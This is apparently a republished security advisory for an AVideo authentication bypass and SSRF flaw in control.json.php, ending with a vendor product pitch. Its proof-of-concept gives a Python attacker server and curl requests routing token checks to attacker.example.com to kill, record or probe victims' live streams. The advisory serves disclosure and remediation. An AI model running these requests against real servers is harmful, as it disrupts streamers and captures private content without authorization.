GHSA-9hv9-gvwm-95f2
CRITICALAVideo Allows Unauthenticated Live Stream Control via Token Verification URL Override in control.json.php
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
wwbn/avideoReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The standalone live stream control endpoint at plugin/Live/standAloneFiles/control.json.php accepts a user-supplied streamerURL parameter that overrides where the server sends token verification requests. An attacker can redirect token verification to a server they control that always returns {"error": false}, completely bypassing authentication. This grants unauthenticated control over any live stream on the platform, including dropping active publishers, starting/stopping recordings, and probing stream existence.
Details
The vulnerability exists because the streamerURL parameter is accepted directly from user input with no validation:
plugin/Live/standAloneFiles/control.json.php:77-79 — User input overrides server config:
if (!empty($_REQUEST['streamerURL'])) {
$streamerURL = $_REQUEST['streamerURL'];
}
plugin/Live/standAloneFiles/control.json.php:83-91 — The user-controlled value is assigned to the request object:
$obj->streamerURL = $streamerURL;
plugin/Live/standAloneFiles/control.json.php:115-126 — Token verification is sent to the attacker-controlled URL:
$verifyTokenURL = "{$obj->streamerURL}plugin/Live/verifyToken.json.php?token={$obj->token}";
// ...
$content = file_get_contents($verifyTokenURL, false, stream_context_create($arrContextOptions));
The legitimate verifyToken.json.php performs cryptographic token validation via Live::decryptHash() and checks token expiry (12-hour window). By redirecting verification to an attacker server, all of this is bypassed — the attacker's server simply responds with {"error": false}.
After authentication is bypassed, the attacker can execute any of the four supported commands (lines 150-186): record_start, record_stop, drop_publisher, and is_recording, which issue control commands to the local NGINX RTMP control module.
SSL verification is also explicitly disabled (lines 119-124), meaning the SSRF request will follow any attacker URL without certificate validation.
Notably, the developers were aware of this exact attack pattern and fixed it in the sibling file standAloneFiles/saveDVR.json.php on 2026-03-19 with an explicit comment: "SECURITY: User-supplied webSiteRootURL is intentionally NOT accepted. Allowing it would enable SSRF." The same fix was not applied to control.json.php.
PoC
Step 1: Set up an attacker server that returns {"error": false} for all requests.
# Minimal Python server on attacker machine (attacker.example.com:8888)
python3 -c '
import http.server, json
class H(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type","application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": False}).encode())
def log_message(self, *a): pass
http.server.HTTPServer(("0.0.0.0", 8888), H).serve_forever()
'
Step 2: Drop a victim's live stream (kill their broadcast):
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=drop_publisher&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"
Expected response (authentication bypassed, command executed):
{"error":false,"msg":"","streamerURL":"http://attacker.example.com:8888/","token":"anything","command":"drop_publisher","app":"live","name":"VICTIM_STREAM_KEY","response":"","requestedURL":"http://localhost:8080/control/drop/publisher?app=live&name=VICTIM_STREAM_KEY"}
Step 3: Start unauthorized recording of a victim's stream:
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=record_start&name=VICTIM_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"
Step 4: Probe whether a stream name is active:
curl -s "https://target.example.com/plugin/Live/standAloneFiles/control.json.php?token=anything&command=is_recording&name=GUESS_STREAM_KEY&app=live&streamerURL=http://attacker.example.com:8888/"
Impact
- Denial of Service on Live Streams: Any unauthenticated attacker can terminate any active live broadcast using
drop_publisher, causing immediate disruption for streamers and viewers. - Unauthorized Recording: An attacker can start recording any live stream without authorization using
record_start, potentially capturing private or sensitive content. - Stream Enumeration: The
is_recordingcommand allows probing for valid stream names. - SSRF: The server makes an outbound HTTP request to an attacker-controlled URL via
file_get_contents(), which could be used to scan internal services or exfiltrate data via the request URL. - No authentication required: The entire attack is performed without any credentials.
Recommended Fix
Remove the streamerURL request parameter override entirely, matching the fix already applied in saveDVR.json.php. In plugin/Live/standAloneFiles/control.json.php, replace lines 77-79:
// BEFORE (vulnerable):
if (!empty($_REQUEST['streamerURL'])) {
$streamerURL = $_REQUEST['streamerURL'];
}
// AFTER (fixed):
// SECURITY: User-supplied streamerURL is intentionally NOT accepted.
// Allowing it would enable authentication bypass and SSRF via file_get_contents
// on an attacker-controlled host. streamerURL MUST come from the configuration
// file or be hard-coded in this file above.
if (empty($streamerURL)) {
error_log("control.json.php: streamerURL is not configured");
die(json_encode(['error' => true, 'msg' => 'Server not configured']));
}
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | wwbn/avideo | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of wwbn/avideo has shipped for GHSA-9hv9-gvwm-95f2 yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-9hv9-gvwm-95f2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-9hv9-gvwm-95f2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-9hv9-gvwm-95f2 in your dependencies?
O3 detects GHSA-9hv9-gvwm-95f2 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.